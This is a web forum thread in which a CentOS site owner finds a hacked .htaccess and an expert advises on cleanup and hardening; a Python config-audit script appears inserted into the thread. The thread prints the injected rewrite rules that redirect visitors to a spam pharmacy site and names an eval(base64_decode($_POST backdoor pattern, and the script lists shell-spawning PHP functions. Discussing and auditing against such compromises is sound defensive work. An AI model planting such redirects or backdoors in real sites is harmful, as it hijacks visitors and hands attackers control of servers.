Solved

website 302 redirect

Posted on 2014-07-28
Last Modified: 2014-07-28
Hi

I am running a CentOS 5 LAMP site. The problem is that one of the pages is being redirected to another page (not mine) that has a link. I think it is a hack.

This is being done on a 302 Found redirect :-

Found

The document has moved here.


The pages are part of my payments processing and so I have taken the site down while I resolve the problem.

I have tested the code and it is being executed correctly :-

   elseif ($pmeth == 'card') {
       //print_r ($inputdata);                 // debug dump, left commented out
       $url    = $url_prefix . "payments/card.php";
       $result = postArray($inputdata, $url);  // POST the form data to card.php
       if ($result != 'ok') echo $result;      // anything other than 'ok' is an error message
       exit;
   }
However, even if I rename card.php to xxx.php the redirect still happens. I don't know much about 302 redirects. How are they configured? Where do I start looking?

Thanks for any help.
Question by:philevans114
8 Comments

Expert Comment

by:Gary
ID: 40224805
Is this Apache? Check your htaccess and httpd.conf
Is this a CMS like Wordpress or your own code?

Expert Comment

by:duncanb7
ID: 40224864
Could you provide us with more information, such as the request and response headers?
You can use the debugger tools from this site http://www.charlesproxy.com/download/

Duncan

Author Comment

by:philevans114
ID: 40224869
Thanks Gary.

It's my own PHP. 2 mins after posting I suddenly realised I should check .htaccess. It's been altered with rewrites and redirects all over the place, e.g.:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://doctor-store24x7.com [R,L]
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]

and more...

I'm also finding eval(base64_decode($_POST[ etc. in some of the PHP pages, and uploaded pages with the same.

I don't know how they are getting in. I'm running CSF and LFD and ClamAV.

I'm about to change passwords etc.

Expert Comment

by:Gary
ID: 40224880
This (base64_decode) is your clue to being hacked.
As you have said, change all your passwords to something strong; that means uppercase, lowercase, numbers and symbols.
Check all your server logins, ftp, ssh etc and change them.
You need to lock down your server.

I would temporarily take your site off line if possible, or if you have a local copy then delete the online version and put your clean copy up. If not then you will have to go through each page and cleanse them.

Author Comment

by:philevans114
ID: 40224948
Thanks Gary for the advice.

I've sanitised the code and have the site off-line now. I don't have a copy that I can easily upload.

I need to prevent them getting in but don't know how. I'm looking at installing CXS. I assume that the base64_decode can inject code into pages somehow.

I need to do a bit more on EE to find out. I would welcome any ideas.

Accepted Solution

by: Gary (earned 500 total points)
ID: 40224964
Without knowing how they got in...
Changing all your passwords is the first port of call.
Any contact forms need to be checked for sanitizing data.
If you are using standard username/password SSH login then change it to certificate based and change the port - SSH is always under attack by hackers.
If you are using any plugins, check if they are updated - some of the easiest ways for hackers to get in.
Do you allow uploads? Are you ringfencing them?
Are you running a firewall like CSF?
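Two items on this checklist can be verified from the config files themselves: SSH (key-based login only, root login off, non-default port) and which PHP functions are disabled. The Python audit below is an added example, not from the thread; the sshd_config and php.ini fragments it checks are constructed. One caveat a defender should know: disable_functions cannot cover eval(), which is a language construct, and disabling base64_decode alone leaves gzinflate/str_rot13 variants of the same backdoor working, so the process-spawning functions are the more useful ones to list.

```python
import re
# sshd uses the FIRST value it reads for a keyword, so a hardening line appended
# below a permissive one changes nothing; the parser mirrors that precedence.
SSHD_DEFAULTS = {'passwordauthentication': 'yes', 'permitrootlogin': 'yes',
                 'pubkeyauthentication': 'yes'}
SSHD_WANTED = {
    'passwordauthentication': ({'no'}, 'PasswordAuthentication no'),
    'permitrootlogin': ({'no', 'without-password', 'prohibit-password'}, 'PermitRootLogin no'),
    'pubkeyauthentication': ({'yes'}, 'PubkeyAuthentication yes'),
}
# OS-reaching functions a PHP backdoor needs; eval() is a construct and cannot be listed.
SHELL_FUNCS = {'exec', 'shell_exec', 'system', 'passthru', 'popen', 'proc_open'}

def parse_sshd_config(text):
    settings = {}                      # keyword (lower-cased) -> first value seen
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        if re.match(r'match\b', line, re.I):
            break                      # conditional blocks follow; audit the global section only
        parts = re.split(r'[\s=]+', line, maxsplit=1)
        if len(parts) == 2:
            settings.setdefault(parts[0].lower(), parts[1].strip())
    return settings

def audit_sshd(text):
    # Return the sshd_config lines still needed to meet the checklist above.
    cfg = parse_sshd_config(text)
    issues = [fix for key, (ok, fix) in SSHD_WANTED.items()
              if cfg.get(key, SSHD_DEFAULTS[key]).lower() not in ok]
    if cfg.get('port', '22') == '22':
        issues.append('Port <non-default>')
    return issues

def audit_php_ini(text):
    # Return the shell-spawning functions that disable_functions leaves enabled.
    disabled = set()
    for raw in text.splitlines():
        line = raw.split(';', 1)[0].strip()
        if line.lower().startswith('disable_functions'):
            value = line.partition('=')[2].strip().strip('"')
            disabled = {f.strip().lower() for f in value.split(',') if f.strip()}
    return sorted(SHELL_FUNCS - disabled)

# Constructed samples: the permissive setup beside the corrected one.
WEAK_SSHD = "Port 22\n#PasswordAuthentication no\nPermitRootLogin yes\n"
HARD_SSHD = ("Port 2222\nPermitRootLogin no\nPasswordAuthentication no\n"
             "PubkeyAuthentication yes\nPasswordAuthentication yes\n")  # last line is ignored
WEAK_INI = "disable_functions = base64_decode\n"
HARD_INI = "disable_functions = exec,shell_exec,system,passthru,popen,proc_open\n"
```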
Author Comment

by:philevans114
ID: 40225038
Hi Gary

Very helpful.

I've set disable_function base64_decode in php.ini, changed passwords and am running CSF. I need to look at the other things.

A good first start. Much appreciated.
Author Closing Comment

by:philevans114
ID: 40225041
Gary went beyond the initial question and provided some very useful support and advice.